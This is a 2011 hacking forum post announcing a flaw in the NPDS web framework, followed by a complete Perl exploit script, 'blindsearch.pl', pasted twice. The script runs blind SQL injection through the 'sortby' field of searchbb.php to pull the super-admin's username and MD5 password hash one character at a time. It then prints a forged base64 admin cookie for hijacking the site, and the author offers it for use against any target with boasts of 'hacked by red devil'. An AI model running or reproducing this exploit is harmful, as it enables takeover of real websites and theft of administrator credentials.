Red-d3v1L
01-06-2011, 10:41 PM
Hello I have found a vulnerability in the framework "NDPS" who is currently hosting thousands of Web site with the exploit in perl you can steal the cookie from the director it's all you have created a cookie with firefox addons Example of use
blindsearch.pl www.target.com
the program searches voila hacked by red devil
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Headers;
use MIME::Base64;
use Digest::MD5 qw(md5 md5_hex md5_base64);
my $ua = LWP::UserAgent->new(agent=> 'Mozilla/4.73 [en] (X11; I; Linux 2.2.16 i686; Nav)');
{
system("clear");
print "\n ::: ---------------------------------------------- :::\n";
print " ::: npds - 10.02 :::\n";
print " ::: version 2.0 :::\n";
print " ::: Coded by Red-d3v1L :::\n";
print " ::: ---------------------------------------------- :::\n\n";
print ">> blindsearch.pl (url)\n\n";
my $url=$ARGV[0];
print "- LOGIN \n";
$chaine1 = "";
$username = "";
for(my $i=97;$i<123;$i++)
{
if (test($chaine1.$i.", 37",0)!="-1")
{
$chaine1 .= $i;
$username .= chr($i);
#print chr($i);
print $username."\n";
if(test($chaine1,0)!= "-1")
{print " OK\n"; goto pass2; }
$chaine1 .= ",";
$i=96;
}
}
pass1:
$password = "";
$chaine2 = "";
for(my $i=49;$i<97;$i++)
{
#if($i==57){$i=65};
#if($i==90){$i=97};
if (test($chaine2.$i.", 37",1,$chaine1)!="-1")
{
$chaine2 .= $i;
$password .= chr($i);
print chr($i);
if(test($chaine2,1,$chaine1)!= "-1")
{print " OK\n"; goto pass2;}
$chaine2 .= ",";
$i=48;
}
}
pass2:
print "- PASSWORD \n";
@hexa = ("a","b","c","d","e","f","0","1","2","3","4","5","6","7","8","9");
$md5="";
#$chaine1="97, 100, 109, 105, 110";
$chaine3 = "";
for(my $i=0;$i<=15;$i++)
{
#print ord($hexa[$i])."\n";
if (test($chaine3.ord($hexa[$i]).", 37",2,$chaine1)!="-1")
{
$chaine3 .= ord($hexa[$i]);
$md5 .= $hexa[$i];
#print $hexa[$i];
print $md5."\n";
if(test($chaine3,2,$chaine1)!= "-1")
{print ' OK'; goto end;}
$chaine3 .= ",";
$i=-1;
}
}
end:
print " Admin Cookie: \n".encode_base64($username.":".$md5);
exit;
}
sub test{
if($_[1]==0){$injection ="(SELECT uname FROM users limit 1 UNION SELECT 1 FROM authors WHERE radminsuper=1 and name LIKE CHAR(".$_[0].") limit 2)";} # aid=CHAR(82, 111, 111, 116) and
elsif($_[1]==1){$injection = "(SELECT uname FROM users limit 1 UNION SELECT 1 FROM authors WHERE radminsuper=1 and name=CHAR(".$_[2].") and pwd LIKE CHAR(".$_[0].") limit 2)"}
else{$injection = "(SELECT uname FROM users limit 1 UNION SELECT 1 FROM authors WHERE radminsuper=1 and name=CHAR(".$_[2].") and md5(pwd) LIKE CHAR(".$_[0].") limit 2)"} #aid=CHAR(82, 111, 111, 116) and
#print $injection."\n";
$req = $ua->post($ARGV[0]."/searchbb.php" ,
[ "term" => "%",
"addterms" => "any",
"forum" => "all",
"username" => "",
"sortby" => $injection,
"submit" => "Recherche",
]
);
return index($req->content,"Aucune réponse pour les mots que vous cherchez. Elargissez votre recherche.");
}
blindsearch.pl www.target.com
the program searches voila hacked by red devil
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Headers;
use MIME::Base64;
use Digest::MD5 qw(md5 md5_hex md5_base64);
my $ua = LWP::UserAgent->new(agent=> 'Mozilla/4.73 [en] (X11; I; Linux 2.2.16 i686; Nav)');
{
system("clear");
print "\n ::: ---------------------------------------------- :::\n";
print " ::: npds - 10.02 :::\n";
print " ::: version 2.0 :::\n";
print " ::: Coded by Red-d3v1L :::\n";
print " ::: ---------------------------------------------- :::\n\n";
print ">> blindsearch.pl (url)\n\n";
my $url=$ARGV[0];
print "- LOGIN \n";
$chaine1 = "";
$username = "";
for(my $i=97;$i<123;$i++)
{
if (test($chaine1.$i.", 37",0)!="-1")
{
$chaine1 .= $i;
$username .= chr($i);
#print chr($i);
print $username."\n";
if(test($chaine1,0)!= "-1")
{print " OK\n"; goto pass2; }
$chaine1 .= ",";
$i=96;
}
}
pass1:
$password = "";
$chaine2 = "";
for(my $i=49;$i<97;$i++)
{
#if($i==57){$i=65};
#if($i==90){$i=97};
if (test($chaine2.$i.", 37",1,$chaine1)!="-1")
{
$chaine2 .= $i;
$password .= chr($i);
print chr($i);
if(test($chaine2,1,$chaine1)!= "-1")
{print " OK\n"; goto pass2;}
$chaine2 .= ",";
$i=48;
}
}
pass2:
print "- PASSWORD \n";
@hexa = ("a","b","c","d","e","f","0","1","2","3","4","5","6","7","8","9");
$md5="";
#$chaine1="97, 100, 109, 105, 110";
$chaine3 = "";
for(my $i=0;$i<=15;$i++)
{
#print ord($hexa[$i])."\n";
if (test($chaine3.ord($hexa[$i]).", 37",2,$chaine1)!="-1")
{
$chaine3 .= ord($hexa[$i]);
$md5 .= $hexa[$i];
#print $hexa[$i];
print $md5."\n";
if(test($chaine3,2,$chaine1)!= "-1")
{print ' OK'; goto end;}
$chaine3 .= ",";
$i=-1;
}
}
end:
print " Admin Cookie: \n".encode_base64($username.":".$md5);
exit;
}
sub test{
if($_[1]==0){$injection ="(SELECT uname FROM users limit 1 UNION SELECT 1 FROM authors WHERE radminsuper=1 and name LIKE CHAR(".$_[0].") limit 2)";} # aid=CHAR(82, 111, 111, 116) and
elsif($_[1]==1){$injection = "(SELECT uname FROM users limit 1 UNION SELECT 1 FROM authors WHERE radminsuper=1 and name=CHAR(".$_[2].") and pwd LIKE CHAR(".$_[0].") limit 2)"}
else{$injection = "(SELECT uname FROM users limit 1 UNION SELECT 1 FROM authors WHERE radminsuper=1 and name=CHAR(".$_[2].") and md5(pwd) LIKE CHAR(".$_[0].") limit 2)"} #aid=CHAR(82, 111, 111, 116) and
#print $injection."\n";
$req = $ua->post($ARGV[0]."/searchbb.php" ,
[ "term" => "%",
"addterms" => "any",
"forum" => "all",
"username" => "",
"sortby" => $injection,
"submit" => "Recherche",
]
);
return index($req->content,"Aucune réponse pour les mots que vous cherchez. Elargissez votre recherche.");
}